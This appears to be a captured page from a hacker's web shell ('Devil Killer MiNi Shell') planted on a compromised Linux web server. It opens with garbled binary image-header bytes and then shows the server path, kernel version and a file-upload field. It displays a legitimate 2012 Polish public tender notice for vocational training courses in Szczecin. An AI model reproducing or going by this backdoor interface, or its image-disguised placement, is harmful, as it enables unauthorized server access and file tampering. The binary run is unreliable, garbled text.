JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120831/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120831/324182-N-2012.html

<p class="kh_header"><b>Szczecin: Przygotowanie i przeprowadzenie szkoleń dla Zachodniopomorskiej Wojewódzkiej Komendy OHP w Szczecinie</b><br>
<b>Numer ogłoszenia: 324182 - 2012; data zamieszczenia: 31.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ochotnicze Hufce Pracy Zachodniopomorska Wojewódzka Komenda w Szczecinie , ul. Dworcowa 19, 70-206 Szczecin, woj. zachodniopomorskie, tel. 091 8126946, faks 091 8127981 w. 36.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zachodniopomorska.ohp.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa Jednostka Budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przygotowanie i przeprowadzenie szkoleń dla Zachodniopomorskiej Wojewódzkiej Komendy OHP w Szczecinie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przygotowanie i przeprowadzenie szkoleń teoretycznych i praktycznych z następujących tematów: 
Część I Sprzedawca z obsługą komputera i kas fiskalnych
Część II Kurs prawa jazdy kat. T, kierowcy traktora 
Część III Kucharz małej gastronomii 
Część IV Spawanie spoinami pachwinowymi metodą MAG (135) 
Część V Eksploatacja urządzeń, instalacji i sieci energetycznych o napięciu 1 kV.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.41.12.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 08.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu spełniania warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że wykonał należycie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie: 
Dla Części I - Sprzedawca z obsługą komputera i kas fiskalnych:
- minimum 2 usługi podobne do objętej przedmiotem zamówienia. Za usługę podobną do objętej przedmiotem zamówienia zamawiający uzna: przeprowadzone przez wykonawcę, dla grupy minimum 5-osobowej, szkolenie, którego program obejmował łącznie co najmniej zakres tematyczny z obsługi kas fiskalnych oraz obsługi komputera. Przez grupę 5 osobową zamawiający rozumie 5 osób (niezależnie od podmiotów zlecających) szkolących się w tym samym miejscu i w tym samym czasie, tj. na tych samych zajęciach, chyba, że ze względu na specyfikę szkolenia i/lub wymagania zlecającego zostało ono przeprowadzone w podgrupach, w różnych salach. Przez szkolenie obejmujące łącznie zakres tematyczny z obsługi kas fiskalnych wraz z obsługą komputera zamawiający rozumie szkolenie (moduł, zakres tematyczny, program) dotyczące minimum łącznie: obsługi kas fiskalnych i edytora tekstu Word oraz arkusza kalkulacyjnego Excel.
Pracami podobnymi nie mogą być szkolenia przeprowadzone drogą elektroniczną, metodą e-learningu, w formie eksternistycznej itp.
Dla Części II - Kurs prawa jazdy kat. T, kierowcy traktora:
- minimum 2 usługi podobne do objętych przedmiotem zamówienia. Za pracę podobną zamawiający uzna: zorganizowanie dla min. 5 uczestników kursu prawa jazdy kat. T (kierowca traktora). Przez grupę 5 osobową zamawiający rozumie 5 osób (niezależnie od podmiotów zlecających) szkolących się w tym samym miejscu i w tym samym czasie, tj. na tych samych zajęciach, chyba, że ze względu na specyfikę szkolenia i/lub wymagania zlecającego zostało ono przeprowadzone w podgrupach, w różnych salach.
Usługami podobnymi nie mogą być usługi szkoleniowe przeprowadzone drogą elektroniczną, metodą e-learningu, w formie eksternistycznej itp.
Dla Części III  - Kucharz małej gastronomii: 
- minimum 2 usługi podobne do objętych przedmiotem zamówienia. Za pracę podobną zamawiający uzna: zorganizowanie dla min. 5 uczestników szkolenia związanego z żywnością i żywieniem, w szczególności kursów: kucharz małej gastronomii, kucharz, pomoc kuchenna, kulinarnych i cateringowych. 
Przez grupę 5 osobową zamawiający rozumie 5 osób (niezależnie od podmiotów zlecających) szkolących się w tym samym miejscu i w tym samym czasie, tj. na tych samych zajęciach, chyba, że ze względu na specyfikę szkolenia i/lub wymagania zlecającego zostało ono przeprowadzone w podgrupach, w różnych salach. Jednocześnie zamawiający wskazuje, że przez usługę podobną należy rozumieć również zrealizowaną usługę szkoleniową zawierającą jako jeden z modułów/zakresów tematycznych/dziedzin, program obejmujący swoim zakresem zagadnienia stanowiące przedmiot niniejszego zamówienia.
Usługami podobnymi nie mogą być usługi szkoleniowe przeprowadzone drogą elektroniczną, metodą e-learningu, w formie eksternistycznej itp.
Dla Części IV - Spawanie spoinami pachwinowymi metodą MAG (135): 
- minimum 2 usługi podobne do objętych przedmiotem zamówienia. Za pracę podobną zamawiający uzna: zorganizowanie dla min. 5 uczestników szkolenia spawania spoinami pachwinowymi metodą MAG (135). Przez grupę 5 osobową zamawiający rozumie 5 osób (niezależnie od podmiotów zlecających) szkolących się w tym samym miejscu i w tym samym czasie, tj. na tych samych zajęciach, chyba, że ze względu na specyfikę szkolenia i/lub wymagania zlecającego zostało ono przeprowadzone w podgrupach, w różnych salach. Jednocześnie zamawiający wskazuje, że przez usługę podobną należy rozumieć również zrealizowaną usługę szkoleniową zawierającą jako jeden z modułów/zakresów tematycznych/dziedzin, program obejmujący swoim zakresem spawanie spoinami pachwinowymi metodą MAG (135) dla grupy minimum 5-osobowej.
Usługami podobnymi nie mogą być usługi szkoleniowe przeprowadzone drogą elektroniczną, metodą e-learningu, w formie eksternistycznej itp.
Dla Części V - Eksploatacja urządzeń, instalacji i sieci energetycznych o napięciu 1 kV: 
- minimum 2 usługi podobne do objętych przedmiotem zamówienia. Za pracę podobną zamawiający uzna: przeprowadzoną przez wykonawcę, dla grupy minimum 5-osobowej, usługę szkoleniową obejmującą swoim zakresem eksploatację urządzeń, instalacji, i sieci elektroenergetycznych. Przez grupę 5 osobową zamawiający rozumie 5 osób (niezależnie od podmiotów zlecających) szkolących się w tym samym miejscu i w tym samym czasie, tj. na tych samych zajęciach, chyba, że ze względu na specyfikę szkolenia i/lub wymagania zlecającego zostało ono przeprowadzone w podgrupach, w różnych salach. Jednocześnie zamawiający wskazuje, że przez usługę podobną należy rozumieć również zrealizowaną usługę szkoleniową zawierającą jako jeden z modułów/zakresów tematycznych/dziedzin, program obejmujący swoim zakresem eksploatację urządzeń, instalacji i sieci elektroenergetycznych dla grupy minimum 5-osobowej.
Usługami podobnymi nie mogą być usługi szkoleniowe przeprowadzone drogą elektroniczną, metodą e-learningu, w formie eksternistycznej itp.

Jeżeli wykonawca składa ofertę na kilka części musi wykazać wymaganą ilość prac podobnych dla każdej z tych części.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu spełniania warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu spełniania warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu spełniania warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1)Oświadczenie o miejscu realizacji praktycznej części usługi szkoleniowej objętej przedmiotem zamówienia, według wzoru stanowiącego załącznik nr 5 do siwz, z podaniem dokładnego adresu (dla Części II-V).
2) Oświadczenie o posiadaniu aktualnego wpisu do Rejestru Instytucji Szkoleniowych prowadzonego przez właściwy Wojewódzki Urząd Pracy, według wzoru stanowiącego załącznik nr 6 do siwz (dla Części I, III, IV i V).
3)Oświadczenie o posiadaniu aktualnego wpisu do rejestru przedsiębiorców prowadzących ośrodki szkolenia kierowców, prowadzonego przez starostę właściwego ze względu na miejsce wykonywania działalności objętej wpisem - zgodnie  z art. 103 ustawy z dnia 20.06.1997 r. - Prawo o ruchu drogowym (Dz. U, z 2005 r., Nr 1 08, poz. 908 z poźn. zm.), według wzoru stanowiącego załącznik nr 7 do siwz (dla Części II).
4)Oświadczenie o posiadaniu aktualnego atestu wydanego przez Instytut Spawalnictwa w Gliwicach uprawniający do szkolenia i egzaminowania spawaczy po kursie spawania blach i rur spoinami pachwinowymi metodą MAG-135, według wzoru stanowiącego załącznik nr 8 do siwz (dla Części IV).</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)oferta cenowa zgodnie z Rozdziałem I pkt 3 siwz;
w przypadku składania oferty wspólnej należy złożyć jeden dokument
2)odpowiednie pełnomocnictwa;
tylko w sytuacjach określonych w Rozdziale I pkt 5 zdanie 2  siwz lub w przypadku składania oferty wspólnej (Rozdział III pkt 1 siwz)
3)oświadczenie według wzoru stanowiącego załącznik nr 1 do siwz wskazujące cześć zamówienia, której wykonanie wykonawca powierzy podwykonawcom (jeżeli wykonawca przewiduje udział podwykonawców);
W przypadku składania oferty wspólnej należy złożyć jeden dokument</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Wszelkie zmiany umowy wymagają zachowania formy pisemnej pod rygorem nieważności.
2.Strony dopuszczają możliwość: 
a)zmian redakcyjnych umowy; 
b)zmian będących następstwem sukcesji uniwersalnej albo przejęcia z mocy prawa pełni praw i obowiązków dotyczących którejkolwiek Stron; 
c)zmian danych Stron ujawnionych w rejestrach publicznych; 
d)zmiany terminów realizacji przedmiotu zamówienia określonych w umowie, w sytuacji:
(a)przedłużających się czynności prowadzących do wyboru oferty najkorzystniejszej w przedmiotowym postępowaniu,
(b)trudności ze skompletowaniem określonej liczby uczestników,
(c)wystąpienia innych okoliczności wynikających z przyczyn leżących po stronie Zamawiającego lub będących następstwem uzasadnionych, niezawinionych przyczyn leżących po stronie Wykonawcy,
e)zmiany miejsca przeprowadzania zajęć.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zachodniopomorska.ohp.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zachodniopomorska Wojewódzka Komenda Ochotniczych Hufców Pracy ul. Dworcowa 19, 70-206 Szczecin w godzinach urzędowania: 7.45 - 15.45..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.09.2012 godzina 10:30, miejsce: Zachodniopomorska Wojewódzka Komenda Ochotniczych Hufców Pracy ul. Dworcowa 19, 70-206 Szczecin Sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Postępowanie jest przeprowadzane w związku z realizacją projektu systemowego - OHP jako realizator usług rynku pracy- współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego
- Priorytet I Działanie 1.3..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Sprzedawca z obsługą komputera i kas fiskalnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest usługa  przeprowadzenia szkolenia z zakresu obsługi kas fiskalnych oraz obsługi komputera dla sprzedawców.
2.Szkolenie odbędzie się w terminie 22.10.-23.11.2012 dla 8 osób.  
3.Zamawiający przewiduje  120 godzin zegarowych zajęć (bez egzaminu) w tym 60 godzin zajęć teoretycznych  i 60 godzin zajęć praktycznych (30 godz. z obsługi komputera i 30 godz. z obsługi kasy fiskalnej) dla każdego uczestnika szkolenia.
4.Szkolenie musi zostać zakończone egzaminem wewnętrznym. 
5. Wymagany zakres tematyczny szkolenia:
a)Obsługa kas fiskalnych i drukarek fiskalnych, 
b)Programowanie kas: artykuły PLU, opakowania zwrotne, stawki VAT,
c)Przepisy i regulacje prawne dotyczące sprzedaży za pomocą kas fiskalnych,
d)Podstawy obsługi komputera, w tym co najmniej:
- użytkowanie systemu MS Windows XP,
- edytor tekstów Word,
- arkusz kalkulacyjny Excel,
- Internet, 
e)Komputerowy program sprzedaży,
f)Organizacja i techniki sprzedaży,
g)Wyposażenie punktu sprzedaży detalicznej,
h)Etyka i kultura w zawodzie sprzedawcy,
i)Podstawy towaroznawstwa,
j)Promocja..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 22.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Kurs prawa jazdy kat. T, kierowcy traktora.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest usługa  przeprowadzenia kursów prawa jazdy kat. T.
2.Szkolenie odbędzie się w terminie 08-19.10.2012 dla 5 osób.
3.Zamawiający przewiduje  30 godzin zajęć teoretycznych (godzina zajęć- 45 minut) i 20 godzin zajęć praktycznych ( godzina zajęć  -60 minut)  na każdego uczestnika kursu.
4.Do kursu przystąpią osoby, którzy uzyskają  orzeczenie o braku przeciwwskazań  zdrowotnych do kierowania pojazdem. Koszt przeprowadzenia badania  lekarskiego obciąża wykonawcę.
5.Celem szkolenia jest nabycie wiedzy i umiejętności niezbędnych do uzyskania odpowiedniego uprawnienia, czyli prawa jazdy kat. T.
6.Wykonawca zobowiązany jest do przeprowadzenia: zajęć merytorycznych teoretycznych i praktycznych, badań lekarskich, egzaminów wewnętrznych, zaopatrzenia kursantów w materiały dydaktyczne, ubezpieczenie NW.
7.Wykonawca zobowiązany jest do przygotowania kursantów do egzaminu państwowego (pomoc w wypełnianiu wniosków itp.) i pokrycia jego kosztów (koszt jednokrotnego egzaminu) oraz pokrycia kosztów dojazdu (lub zapewnienia transportu) kursantów na egzamin z Trzebiatowa do miejsca przeprowadzania egzaminu i z powrotem.
8.Kurs musi być przeprowadzony zgodnie z ustawą Prawo o ruchu drogowym ( Dz. U z 2005r Nr 108, poz.908 z późn. zm.) i rozporządzeniem Ministra Infrastruktury z dnia 27 października 2005 r w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów ( Dz. U. Nr 217, poz. 1834 z późn. zm.).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.41.12.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 08.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Kucharz małej gastronomii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest usługa  przeprowadzenia szkolenia z zakresu małej gastronomii.
2.Szkolenie odbędzie się w terminie 26.11-21.12.2012 dla 8 osób.  
3.Zamawiający przewiduje  120 godzin zajęć (bez egzaminu) w tym: 60 godzin zajęć teoretycznych  i 60 godzin zajęć praktycznych dla każdego uczestnika szkolenia.
4.Szkolenie teoretyczne odbędzie się w Ośrodku Szkolenia Zawodowego w Trzebiatowie, ul. Witosa 8. Zamawiający bezpłatnie udostępni wykonawcy pomieszczenia szkoleniowe.
5.Zamawiający wymaga, aby wykonawca zapewnił miejsce przeznaczone do prowadzenia zajęć praktycznych.
6.Szkolenie musi zostać zakończone egzaminem wewnętrznym. 
7.Wymagany zakres tematyczny szkolenia:
a)dobieranie surowców i półproduktów do produkcji w małej gastronomii
b)dobieranie, obsługiwanie maszyn, urządzeń i sprzętu w małej gastronomii
c)przeprowadzanie obróbki wstępnej surowców i półproduktów w małej gastronomii
d)przygotowywanie półproduktów do dalszej obróbki w małej gastronomii
e)dokonywanie obróbki termicznej surowców i półproduktów w małej gastronomii
f)sporządzanie różnymi technikami i metodami podstawowego asortymentu potraw i napojów w małej gastronomii
g)planowanie posiłków i układanie prostego menu w małej gastronomii
h)porcjowanie, dekorowanie i ekspozycja potraw w małej gastronomii
i)organizowanie i porządkowanie własnego stanowiska pracy w małej gastronomii zgodnie z zasadami ergonomii
j)bezpieczeństwa i higieny pracy, ochrony
k)przechowywanie i magazynowanie surowców, półproduktów i wyrobów gotowych w małej gastronomii
l)ocenianie jakościowe i ilościowe surowców i półproduktów w małej gastronomii
m)ocenianie jakościowe i ilościowe wyrobów gotowych małej gastronomii.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 26.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Spawanie spoinami pachwinowymi metodą MAG (135).</p>
